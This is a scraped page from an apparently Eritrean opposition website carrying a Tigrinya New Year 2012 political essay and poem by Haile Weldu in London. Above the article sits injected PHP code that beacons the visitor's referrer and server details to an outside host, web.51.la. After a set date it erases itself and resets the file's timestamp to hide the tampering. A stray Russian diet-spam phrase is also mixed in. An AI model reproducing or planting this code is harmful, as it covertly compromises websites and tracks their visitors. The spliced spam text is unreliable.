check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } መርሓባ ዓመተ 2012። “ከም ቀደም መሲሉክን፡ ውሕጅ ሎም ዘበን ግን እንዳ’ንሰራሰረ ደኣ ወሰደክን።”
кремлевская диета

መርሓባ ዓመተ 2012። “ከም ቀደም መሲሉክን፡ ውሕጅ ሎም ዘበን ግን እንዳ’ንሰራሰረ ደኣ ወሰደክን።”

User Rating: / 1
PoorBest 

 

 

 

 

መርሓባ ዓመተ 2012ከም ቀደም መሲሉክን፡ ውሕጅ ሎም ዘበን ግን እንዳንሰራሰረ ደኣ ወሰደክን።

ወትሩ ዘይሕለል ምስጋና ንልዑል ፈጣሪ ናብ ሓድሽ ዓመት ዘብጽሓና! ሕሙምና ፈዊሱ፡ ጥሙይና ዓንጊሉ፡ ድኹምና ሓይቡ፡ ቁሩርና ኣማሚቑ፡ ጸገምና ጸሪጉ፡ መለኽቲ ኣልሚሱ፡ ሰላምን ቅሳነትን ፍትሕን ዝዓሰሎ ዓመተ 2012 ይግበርልና! ኣሜን!

ዓሚ ከምዚ ሎሚ ፡ንዓመተ 2011 ንምቅባል ዝደረስኩዎ ግጥሚ እዕርየ ዝዝክሮ፤ ደልየ ነይረውን፡ ንብርኽቲ ዓደይ ዝቐደሰት ዓመት ክትኮነለይ። ፍትሕን ሰላምን ዝነግሰላ ዓመት ክትፈርየለይ። ግለ ካብ ትሕዞኣውን፡

መርሓባ መርሓባ በዓልሓዲሽ ዓመት፡

ተመስገን በጺሑ፡ ትጽቢተይ ብኡነት።

ምቕልልቲ ኩንልና፡ ንኹሉኣሕጉሲ፡

ኣድንኒ ሰብብረት፡ ጸጽቡቕ ቀልሲ።

ይእከልኩም በልና፡ ዓወት ውረስዮ፡

ንመስዋእቲ ኣሕዋት፡ ብግርማ ምልእዮ።

ዓመተይ!!

ኣይትተዓንቀፊ ካብቲትደልይዮ፡

ታህዋኸይ ፍጡርዩ፡ ባዕልኺለኽዮ።

     በሉስከ መዓስ ተጋግየ? ሕጅውን ጸሎተይን ድልየተይን ከምኡውን ቃልሰይ ኣይክቕየርንዩ። ኣብ ዓመት 2011 ከባብየይ ብሳላ ሰላማዊ ቃልስታትን፡ ዝኽፈል ዘሎ መስውእቱን፡ ብዓወታት ዓምቢቦም፡ ህዝብታቶም ብሳል ቃልሶም ብጸጋ ተመሊኦም፡ መናእሰይን ዓበይትን ብተስፋን፡ ፈንጠዝያን፡ ክዘሉን ክድሰቱን፡ ርእየዶ ኸይኮንኩ ኣንታ? ብኣንጻርዚውን፡ መንከማና ዝብሉ ዝነበሩ ጸዋጋት መለኽቲ፡ ጭራኦም ደጒሎም ክሃድሙን፡ ተሞቁሖም ኣብ ቅድሚ ፍትሒ ክዳነዩን፡ ኣይንርኣዮ እንተ ገሊኦምውን ዋላ እቲ ዘይንቡር ምጉያሕ ከም ንቡር ያኢ ኮይኑስ ስኢኖሞ፡ ክፍርፍዑ ዝረኣኹሉ ዓመት ስለ ዝኾነ፤ ኩሉ ሕመቑ ዕሽሽ ብምባል ንስለ ዝሓሸ መጻኢ፡ መርሓባ ምባለይ፡ ዳርጋ ብፍጹም ኣይሓመቐንን። ስለዚ ሕጂውን ደጊመ መርሓባ ንሓዳሽ ዓመት 2012 ይብል ኣሎኹሞ፣ ዓመተ ዕርቅን፡ ሕድገትን፡ ሰላምን፡ ቅሳነትን፡ ምዕባለን፡ ፍትሕን፡ ዲሞክራሲን ትኹነልና!

     ከምቲ ዝበሃልሲ፡ ጎቦስ እምኒ ድሕሪ እምኒ እንዳኣግዓዝካ ናብ ጎልጎል ዝቕየር እሞ፡ መለኽቲውን ወግሐ፡ ጸብሐ፡ ኮታ ሓደ፡ ድሕሪ ሓደ ንመሰረታቶም እንዳ ጉሓፉ ስለ ዝኸዱ፡ ከምዛ ሰብ ዘይነበሮም ሌጣ ምትራፎም ልሙድዩ። ከምኡ ስለ ዝኾነውን እንሆንዶ ምልኪ ሃገርና ኣብ 20 ዓመቱ ድሮ ቁሪ ኣትዩዎን፡ ገብኢ መሊሱሉን፡ ቀደም ዝተሓረሞ ኮቦርታ ኢጋድ፡ ጋቢ ሕብረት ኣፍሪቃ፡ ነጸላ ሕቡራት ሃገራት ሃሰውሰው የብሎ። ኣንቱም ሰባት ንዘይፈልጥ ክገርሞ ይኽእል ይኸውን? እዚ ትማሊ ሰብ ምዃኑ ተዘንጊዑ፡ጻድቕዝብል መዓርግውን ዳርጋ ንኢሱዎስመልኣኽዝብል ንጌጽ ደጊም ማእሚኡዎ መንገብገብ ኣወናዊኑዎ ነብሱ ኣብ ምፍታሽ በጺሑ ዝነበረ ስልጣን ሓያላት፡ ካን ሕጂስ ወየን ዝርካበንህዝባውያንመቖምያታቱ ስኢኑወን፡ ዓንዲመስዋእቱተሓርኪሙ፡ ኣያን፡ ኣቦን ናይ ኣብ ፈቐዶ ባሕርን ምድረበዳን ብኾንቱ ዝጓሓፉን፡ ኣካላቶም ንዶላራት ብመሸጣ ዝጉያሕ ናይ ዘሎዉ ኤርትራውያን መናእሰይደቁኮይኑስ፡ ግርማኡን፡ መንከምኡን ለጊሱ፡  ወግሐ ጸብሐ፡ ኣብኤህ!’ በጺሑ ዝእኖሆ።

     ወዮም ንዑኡ ዝመሳሰሉ ዝነበሩ ደቂ-ማሕበሩ፡ ካብ ስልጣንን ሃበስ-ቀደስን ተኸሊኦምን ኣፍንጫታትቶም ተደርዒሞም ጥራሕ ዘይኮነስ፡ እቲ ኣጉል መሕሰቢታቶም ኮይኑ ዝጸንሐ ሃውተታ፡ኣይውረድይብሉ፡ ኮታ መላኽ ሃገርናውን ስውያ ወሲኹ ክወናወነሉ ዝነበረ ሃውተታዊ ፍልስፍና፡ ኮታ ዕል-ዕለ ተባዕታይ ኣርሓ ደርሆ እንተበልኩዎ መዓስ ክንእሶ ኢሉ። ኣብዚ ዘበን ብዕል-ዕለ ተታሊለን ንዝበለጸ እንቋቁሖ ዝምነያ ደርሁት ሳላ ምዕብልና ክንደየናይ ክርከባ ኾይነን? ስለዚ ኣሕዋትን ኣሓትን፡ እቲ ኣብ ቅድመይ ዝርእዮ ዘሎኹ ጸወታ ዒንኪላሎ ደጊም ይውዳእ ዘሎ። ግን ነዚ እንርእዮ ዘሎና ሕሱም ዓለም ኣብ ግምት ብምእታው፡ ዝኽሪ መስዋእትና ከቢሩን ተዘኪሩን ምእንታን ክነብር፡ ድኻምን ስራሕን መናእሰይ ኣስገዳድ ሃገራዊ ኣገልግሎት ንኸንቱ ከይጠፍእን፡ ዓመት 2012 ካብ ተካል ሕምሽምሻዊ ህሞት ለውጢ ኸዊላ፡ ሕሰም ጥፍኣት ሓድ-ሕድ ኣልጊሳ፡ ሰላማዊ ዝኾነ ውሑስ መቓይሮ ህዝባዊ መንግስትን፡ ስልጣንን ክትዕደለና ድልየተይ። ነዚ ብምስትውዓልውን ንልቢ ዘሎዎ ክመክር ኣተፈተንኩ፣ ንልቢ ዘይተሳእኖውን ልቢ ኣይትኽልኣዮ እንተበልኩ፡ ዘይንቡር መዓስ ክኸውን ኢሉ?

     ኣብ ቀረባ እዋን፡ ሓደ ካብ ዓቀይቶት መላኺ ስርዓት ሃገርና ክብሎ ከም ዝሰማዕኩዎ፡እዚ እንጓዓዞ ዘሎና (ሃገርና ማለቱ) ካባኡ ዝበለጸ ኣማራጺ መንገዲ ስለ ዘይረኸብናሉ ብሓጎጽጎጽ ክንከዶ ንግደድ ዘሎና። ዝሓሸ መንገዲ እንተዝነብርና፡ ንሕናውን ከማኹም ሰብ እንዲና፡ ጽቡቕ መዓስ ምጸላእናዮ? ስለዚ ንመተካእታ ዘይብሉ ጉዳይ፡ ከም ቀደምና ደኣ መዓንጣና ሸጥ ኣቢልና ንመክቶ!” (ብናተይ ኣቀራርባ ተመዓራርዩ ኣሎ።) ክብል ሰሚዐዮ። ሕጂዶ ካባኹም ክሓብኦ፡ ደንጊጸሉ።እንታይ ርካቡ ረኸበ፡ እዚ ጅግና ሓወይ!” ምባል ኣይገድፍኩን። ብርግጽ ሳላ ዝረኸቦ ዓቀይታዊ ሓለፋታት፡ ንዝርካባ ወልቃዊት ሂወቱ ስጋብ ንአውሮጳ ተጓዒዙን ተሓኪሙን ላቐባ ክገብር ዝኸኣለ ምባለይ ብሓቂ ድፍረት ከስምዕ ይኽእል ይኸውንዩ። ግን ኣነ ንምንታይ ነቲ ሓለፋ ረኺቡዎ? ኣይኮንኩን ክብል ዝደሊ። እቲ ብሰንኪ ጉጉይ መንገዲ ምሕደራኡን ፖሊሲኡን ሓለፋ ያኢ ተቖጺሩ ዝእኖሆ ሕክምናዊ ረድኤት፡ ኩሉ ክረኽቦ ይግባእ ነይሩ ዝብል ዘሎኹ። ብሓቂ እንተኾይኑውን፡ ንሱ ዘይረኸበሞ መን ብዝያዳኡኸ ሓለፋ ክወሃቦ ነይሩ? ነዚ ሕጂ ሓለፋ ኮይኑ ያኢ ረኺቡዎ ዘሎስ እንቋዕ ኣይሰኣኖውን። ከም መግለጺ ነፍሱ ይምሓር ተጋዳላይ ሳልሕ፡ መኪ ክንደይ ተጋደልቲ ነበር ነዚ ሓለፋ ስኢኖም ንዓዲ ኩላህና ቀደም ዘይተሳጋገሩ። ኣነ ዝምነዮ እቲ ሎሚ ሓለፋ ኮይኑ ዘሎ ቁንጣሮ፡ ንኹሉ ኤርትራዊ ንኽባጻሕን ጸገምናን ሕሰምናን ንኸልግስዩ።

     ኣንቱም ሰባት፡ ኣብ ኩሉ ኤርትራዊ ዘሎ ሃገራዊ ወኒ በረኸትኮዩ። ነዚ ከማቓርሕ ዝኽእል ራኢ፡ እንኳይዶ ነዛ ቁንጣሮ ሃገርናስ፡ ንዓሰርተ ኽንዳኣ ንኽሰርሕ ዓቕሚ ዘሎዎ ህዝቢዩ። እዚ ትማሊ ንስለ ሃገሩ ነብሱ ዘይበቐቐ ህዝቢዚ፡ ወዮ ደኣ ብሰንኪ ስሱዕ መሪሕነት ባህጉን ድልየቱን  ተጨውዩ ናብ ዘየድሊ ኣቕጣጫ ተጠምዚዙ እምበር፡ ከምቲ ንቕያ ኣብ ነጻነቱ ዘርኣዮ፡ ድሮ ንቕያ ሓርነቱ ርጉጽ ገይሩዎኮ ምኾነ ነይሩዩ። እሞ ሕጂውን ማይ ኣይሓለፎን። ኣብ ዓመተ 2012 ራኢኡ ብገዛኣ ነብሱን ባዕሉን ወኒኑ፡ ራህዋን ምዕባለን ከምቀደሙ ክግስግስን ክሓፍስን ንኽሪኦ ምንዮተይ ወሰን የብሉን።

     ወዮ ደኣ ጥዑም-ጥዑም ጥዒሙኒ ናብ ዘይደለኹዎ ቁሩብ ኣስጊለኩም ጸኒሐምበር፡ ነዚ ኣብ ልዕሊ ዘሎ ብሂል ዓቀይቶት ይኹን ጎይትኦም ክምልስ እንተኾይነስ፡ ኣይፋልኩምን! ነዚ ኢልኩም ደም ኣይትተሓለቡልና! ናይ ነብሰታትኩም ካብ መረጽኩሞ እንታይ ክበሃል ኢሉ፡ ተረካብ ይዓድዮ ከምዝብሉዎ ግን፡ ንምንታይ ንዘይሰልጥ ባህግታትኩም ህዝቢ ኣብ ዘይተሕተተሉን፡ ዘየድመጸሉን፡ ዘይውሳነኡን ደም ንኽሕለብ ትገብሩ? ብዘይቃለዓለም ግን ህዝቢ ኤርትራ ንሃገሩ ዝኸውን ንኽሰርሕ ዓቕሚ ስለዝውንን፡ ንስኹም ባልዕ ኮንኩም እተሳቕዩዎ ዘሎኹም፡ ካብ ሂወቱ ኣልገሱሉ! ይኽእል ነዛ ሃገር፡ ዓዲ ጸባን መዓርን ክቕይራ። ንስኹምውን ከም ሰብኩም ነዚ ሕጂ ከም ሓለፋ ገርኩም እትወስዱዎ ዘሎኹም ቁንጣሮ፡ ካን ብድቁሳትኩም ኣብ ተተርኣሳትኩም ምረኸብኩሞ ነርኩም። ሓቂ-ብሓቂ እቲ ቕኑዕ መንገዲ ጠፊኡኩም ዘሎ! ኣልግሱሉ! እወ ሕጂ ኣልግሱሉ።

     ካን ነዛ ሰፋሕ ዓለም ጠንጢንካያን ተሓሪምካያን፡ ሰብካን ማልካን ኣብ መጻብቦ ዳጒንካ ትነብር ከምዘየለኻስ፡ ነዚ ኣብ ጸቢብካ ክነብር ዘይመረጸ ግን ፍቕሪ ሃገሩ ከይጸገበ ብሰንኪ ተካል ምሕደራኻ በብእዋኑ ንሃገሩ ጠንጢኑ ድሕሪ ምውጻእ፡ እቲ ዘዋጽኦ ኮታ ተመሳሲሉ ምስ ዝሰፍሐ ዓለም ተላልዩን ነብሱ ኣመሓዲሩ ከከም ዓቕሙ ጸጋታት ዝሓኑኽ ዘሎ ኣካል ህዝቢ ኤርትራዚ፡ ሓደ ካብቲ ውሁብ ኮይኑ ዘሎ ሓለፋታቱ ርእይቶኻ ብነጻ ምግላጽዩ።ንሕና ነዚ ንመደናገሪ ዝመጽኣ ዘይከኣል ነገር ኣይንኣምነሉን ኢና። ግን ንምድንጋርኩም ኢሎም ሓቂ ካብ በሉኹም ግን፡ በቲ ኣገባቦም ተጠቒምኩም ትጋገዩ ኣሎኹም ኢልኩም ኣስምዑልና።ዝጥዕም ኮታ ኣብ ውዲታዊ ክለሳ-ሓሳብ (ኮንስፒራሲ ቲዮሪዝነብር ዘይምዕሩይ ሃበስ-ቀደስ ተጎዝጕዝካ ሃለውለው ምባል ተመሪጹስ፡ ፈርሙልና ክበሃል ኣብ ፈቐድኡ ንምስክሮ እኖሆ። እቲ ሕቂ ግን እዚ ኣገባብ ንሃገር ኣየድሕን፡ ንዘለቕለቕ ኢሉ ዘሎ ስልጣናትኩም እውን ኣየደልድልንዩ። ዝልከም ክትልኩሙ እምበር፡ ጌና ምስ መንግስቲ ኣሜሪካ ንምስዕሳዕ፡ እንተኾይኑልኩም ሎቢዪስትስ ብገንዘብ ክትቑጸሩ መዓስ ክተርፍ ኢሉ? “ልዕሊ ኣቡን ካቶሊክ ክንከውን ኣይንፈትንተባሂልናዶ ከይኮንና ቅድሚ ሕጂ።

     ዓለም በዚ እትስጉሞ ዘሎ ናህሪ፡ ኣብ ዓመት 2012 ኣብ ኣጠስጢስኩሞ ዘሎኹም ስልጣን ንኽትቅጽሉ ካብ ዝደልየኩም፡ እቲ ዘይደልየኩም ብብዝሒ ክተዓጻጸፍ ምዃኑ ትዝንግዑዎ ኢኹም ኣይብልንየ። በዚ መሪጺኩሞ ዘሎኹሞ ኣገባብዚውን ብርግጽ መዓልታት ስልጣንኩም እንዳሕጸረዩ። እወ ከምቲ ኣቐዲመ ዝበልኩዎ ወዮ መለቀብ ዕድመኹም ዝጸንሑ ደቂ-ማሕበርኩም  ተተማሊኦሞ ንዓዲ ኩላህና ከይዶምን ይኸዱንዮም ዘሎዉ። እንተኽኢልኩሞ እቲ ዝተርፈኩም ዘሎስ፡ ነዛ ብርኽቲ ሃገርና ናብቲ ንቡር ባህጋ፡ ማለት ዓዲ ሰላምን፡ ቅሳነትን፡ ፍትሕን፡ ማዕርነትን፡ ዲሞክራሲን ንኽትሰጋገር ምእንታን ክትተሓጋገዙዋዩ። እዚ ጸጋ ህዝባዊዩሞ፡ ህዝቢ ባዕሉ ክውንኖ ግድንዩ። ደጊምሲ ዓዕንቀፍቱ ካብ ምዃን፡ ኣብ መሳርሕ ለውጡ  ትስለፉዶዩ፡ ሕቶ ዓመትዚ። ደጊም ሕጂስ ከምቲ ቀደም ጉልባብካ ገሊጽካን ብሕጫጨን፡ኣብ ኤርትራ ዲሞክራሲ ከም ስርዓት ከነበግሶ 40-50 ዓመታት ገና ተሪፉዎ ኣሎ።ኣይበሃልንንዩ። ! ! ! እቲ ከምኡ ንምባል ዝሕግዝ ዝነበረ ዘይጥጡሕ ሰግለለት ደጊም ሓሸውሽው ኢሉን፡ ዓንዩንዩ። እቶም ከምኡን ወዲ ኸምኡን ከሳስዩ ዝጸንሑ ኣሕሉቕ ሃበስ-ቀደስ፡ ከም ፕረዚደንት ሊብያ ነበር መዓመር፡ ቓዛፊ ንመቓብር ሒዙምዎ ከይዶምዮም! ግን ከኣ፡ ካባኡ ኣይሕለፍ ተባሂሉ ሕጂ፡  ክድገም እንተ ተመሪጹውን ከምዚ ኣርእስቲ ጽሑፈይ እቲ ሓቂ።ከም ቀደም መሲሉክን፡ ውሕጅ ሎምዘበን ግን እንዳንሰራሰረ ደኣ ወስደክን።እቲ ዝስዕቦ ሕቂዩ።

     ግን፡ ንስለ ብርኽቲ ሃገር። ንስለ ውላዱ ዘይበቐቐ ህዝቢዚ። ንስለ እቶም ንነፍሶም ከይበቕቑ ንስለ ፍትሕን፡ ሰላምን፡ ዕርቅን፡ ብልጽግናን ሃገር በጃ ዝገበሩ ስዉኣትና። ንስለዞም መተካእታ ተኸሊኦም ኣብዚ ማሺነራዊ ዓለም ከምዘይነብሩ ዘሎዉ፡ መዋዕል ንእስነቶም ብሙሉኡ ብነጻ ማል፡ ብጥራይ ኢዶምን፡ ብኣጻፍሮም ክፍሕሩን፡ ክሃንጹን፡ ከልምዑን፡ ክከላኸሉን ወግሐ፡ ጸብሐ ደም ዝሕለቡ ዘሎዉን ደቕኹም፡  ዕርቂ ፍተዉ። ፍትሒ ምለሱ። ቅዋም ኣተግብሩ። እሱራት ፖሊቲካን ሕልናን ብነጻ ልቐቑ። ገደብ ግዜ ዘይብሉ ግዱድ ዕስክርና ኣቑሙ። ሕረስ ሓረስታ፡ ንገድ ነጋዳይ፡ ፍለጥ ፈላጣይ በሉ። ብሰላም ስልጣንኩም ንህዝቢ ኣሰጋግሩ። ብርግጽ እቲ ብቕድሚ ሕጂ ብሰንኪ ትሪ ልቡኹም ዘይዳህሰስኩሞ፡ ምሕረት ሓዳግ ህዝብኹምን ምስጢር ዓወታቱን ሽዑኡ ብግቡእ ክትርድኡዎን ከተስተማቕሩዎ ኢኹም። 

     ዓመት 2012 ነቲ ጸጋ ሃገር ላዕልን፡ ታሕትን ዘይፈላሊ፣ ወድን፡ ጓልን ዘይፈላሊ፣ ኣስላማይ፡ ክስታናይ ዘይፈላሊ፣ መታሕታይ፡ ከበሰታይ ዘይፈላሊ፣ ሲቪል፡ ወትሃደር ዘይፈላሊ፣ ዓረብ፡ ትግርይና ዘይፈላሊ፣ ኣወ! ብሳላ ውሁብ ፍልልያትና ወቂብናን፡ ሰሚርናን፡ ልዕሊ ኹሉውን ድኹምና ሓዪብና፡ ሓያልና ገኒሕና፡ ብተመስገን ብሰላምን፡ ፍቕርን፡ ስኒትን ኣጊጽና ብሓባር ንኽንነብር ተብቅዕና።

     ኣብ መፈጸምታውን፡ ወዮ ካብ ምልኪ ኣሕዋት ዝሓስም የልቦንሞ፡ ናብ ዝመረረ ኣቕሊበ እምበር፡ ንመልምዒ ምልኪ ዳርጋ ቀለብ ኮይኑ ዘሎ መንግስቲ ኢትዮጵያ፡ (ከም ጎረበት ሃገር ሙሉእ ቅሳነትን ምዕባለን እንዳተመነኹሉ።) ደጊም ሕጂስ ይእከል ኣብ ሸንኮለል ምንባር እንተበልኩስ ፍጹም ጌጋ የብሉን። ኣብ ዓመት 2012 መንግስቲ ኢትዮጵያ ካብ ዓለም ብይኑ ሂቡሉ እንክንሱ፡ ብሓይሊ ካብ ሒዙዎ ዘሎ መርየትና ሎሚን ጽባሕን ከይበለን፡ ንኹሉ ቀሚሽ ኣደይ ሓንኲሉኒ ዝብለሉ መኽንያታትውን ንሕልናኡ በዲሁ ክወጽእዩ። ነቲ ኣብ ቦታ ከካይዶ ዝርከብ ዘሎ ዝተፈላለየ ኤኮኖምያዊ ይኹን ህዝባዊ ንጥፈታት ጠጠው ኣቢሉ፣ ኣብ ልዕሊ ኤርትራና ኣብ ክንዲ ድነ ጥፍኣት ምንጽልላዉ ኣትሪፉ፡ ጸዳል ምሕዝነትን፡ ድሕነትን፡ ግስጋሰን፡ ምትእምማንን ክኾነልና እትስፎ። ብማዕረኡውን ህዝቢ ኢትዮጵያ ካብቲ ብዓይኒ ማዕዶ ዝጥምቶ ዘሎ ኣፍ-ደገ ባሕርታት ኤርትራ ዘይቀሊል ረብሓታት ይኸስር ከምዘሎ መጠን፡ ንጀሚሩዎ ዘሎ ህንጸት ሃገሩ ንውሑስ ኣንፈት ንምምዕዳውን፡ ናብ ብማዕረኡ ተታሓሒዘዮ ዝብሎ ዘሎጥምጥም ድሕረትመሊኡ ንኽጓዓዝውን፡ ከንቱ ትምክሕትን መን ከማይን ተሰይሩ፡ ድልድል ነባሪ ዕርቂ ዘርሓወሉ ትስፉው ዓመተ 2012 ክኾነሉ ተስፋይ።

     ዘይተርፍ ከየትርፈልኩም። ብዛዕባጉብኤ ኣዋሳዘሎኒ ወስ ከብለልኩም ፍቐዱለይ። ገለ-ገለ ዳእላ ዝፈትዉ ኣሕዋት፡ ኣብ ክንዲጉባኤ ኣዋሳ ምስተን ሻርባታት ሓዊሶም፡ጉባኤ ብሔር፡ ብሔረ-ሰባትክብሉ ቀንዮምሞ፡ ገለ-ገለናውን ኣይፋልኩምን እንዳበልና ፍሽኽ ምባል መዓስ ገዲፍናልኩ ቀኒና። ድሓን ይእተዉ መሳሰይትኹም ኢትዮጵያውያን 52 ብሔራውያን ሻርባታት ኢትዮጵያ ኣጸባቢቖሙኹም እምበር፡ እቲ 101 ዝሕብሩ ፍልልያትናን ድሑር ኣወጋግና ፍልልይታትናንስ፡ ኣብ ሕርያ ሕብርታት ንሻርባ መረኻኸበልና ነይሩ።ንዝገበረልካ ወይ ግበረሉ ወይ ንገረሉ።ከም ዝበሃል፡ ወዮ ደኣብገንዘብና ዘካየድናዮ ጉብኤዩ።ዝብል ኣበሃህላ ዳርጋ ፋሺን ኣዋሳ ጌርኩሞ ሸነን ክትብልሉሉ ትደልዩ ኣሎኹም እምበር፡ ደጊምሲ ኣፍኩም መሊእኩምን፡ ከይሓነኽኩምን ሳላኣሕዋትናኢትዮጵያ ማዕሪግና እትብሉሉ ዓመት ደጊም ይግበሮ። ብዝተረፈውን ሓዲሽ ዓመትና፡ ሕብእብእኩም ኣኽቲሙ፡ ጉልባብኩም ቀሊዕኩም፡ ጸገምኩምን ጸገማት ህዝብኹምን ነጺርኩም፡ ሰብን ማልንንኤርትራ ከይጎዳእኩም ብሰላም ንዓድና እትመልሱና ይግበርኩም እንተበልኩ ኣይ ኣቃለልኩኹምን? እንተብወገነይኳ፡ ከምቲ ዝምሰል ኮይኑለይ ዘሎ።ኣቡኣን ቀሺ፡ ሓዋን ዛቑናይሲ፡ ኣብ ቤታ ኣንከላያ ቆሪሳ ትቖርብ።ከም ዝብሉዎ፡ ኣብዚ ሓዲሽ መሪሕነት ደጊም ሎንዶን ብሎንዶና እንድዩ ከዲኑ ዘሎ። መዓስ ንሱ ጥራሕ፡ ሕልፍ ዝበለውን ኣብቲ ዝለዓለ ጽፍሑ ኣዕሩኽተይ ተወሲኾሞ ኣሎዉሞ፡ ንምንታይ ጽቡቕ ምልክት ገረ ዘይወስዶ? እንተ እቶም ገለ ምስኣቶም ኣብ ኣዋሳ ቀንዮም እንክንሶም፡ ሕጂ ብኹኖ ሓጹር ዘሎዉ ኮይኖም ዝስምዑኻ ካላኦት ኣዕሩኽተይ፡ ወይ መሰረታት ጉባኤዚውን እቲ ጉብኤ ኣብ ኢድና ስለ ዝነበረ፡ ዝደለናዮ ንሸይም፡ ንዘይደለናዮውን ንጥርዝ።” (ኣብ ሎንዶን ብእዝነይ ዝሰማዕኩዎዩ።) ንዝብሉ ዘሎዉ ብምስትውዓል፡  ምስቲ በት ካልእ ሸነኽ ዝፍኖ፡ እዚ ጉባኤ ምስ ተሞክሮ ቀዳማይ ጉብኤ ... ዘዛምድ ብሂል ብምንጽጻርውን፡ ሎሚኸ እዞም ኣብ መሪሕነት ተሰቒሎም ዘሎዉ ኣዕሩኽተይ፡ ከምቶም ሰብ ቀደም፡ ካን ኣስናንዶ ዘይብሎም ክኾኑ እንዳበልኩ እፈርሓሎም። ስለዚውን ምኽስታን ምኽስታኑስ ብዘይፈልጡ ከይትኽስትኑ ዋሕስ ክሳድ ትኸሉ ኣይገድፈሎምን። ጽባሕ መሲሉና ኔሩ ካብ ምባልን ንምድሓንውን ታሪኽ ሕሩያትን፡ ምሩጻትን ከይድገመልኩም ኣስናኩም ጫሕ ኣብሉዎውን ኣይገድፍን። ብዝተረፈ ጽቡቕ ምንዮት ንመን ምስ ቀተለ፡ ሕዝብና ክሕሾ ምእንታን፡ ከይተሸረፍኩምን ከይተጎረሽኩምን ካብ ጎይቶት ውሽጥን ደገን ዝተሓረረት፡ ብሰላማዊ ህዝባዊ ስልጣን ዝወቀበት፡ ማዕረኣዊት ሃገር ኣብ 2012 እንተ ኣርኢኹሙና ድንቁርናይ ብዘይ መውሓጢ ዘው ከብል ዝኽእል ሰብ እሞ፡ ወድሓንኩም!

ፈጣሪ ሃገርና ይባርኸልና!

ፍትሕን ዲሞክራስን ይንገስ!

ስዉኣትና ንዘልዓለም ይዘከሩ!

ሓውኹም:

ሃይለ፡ ወልዱ።

ሎንዶን።

 

 

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player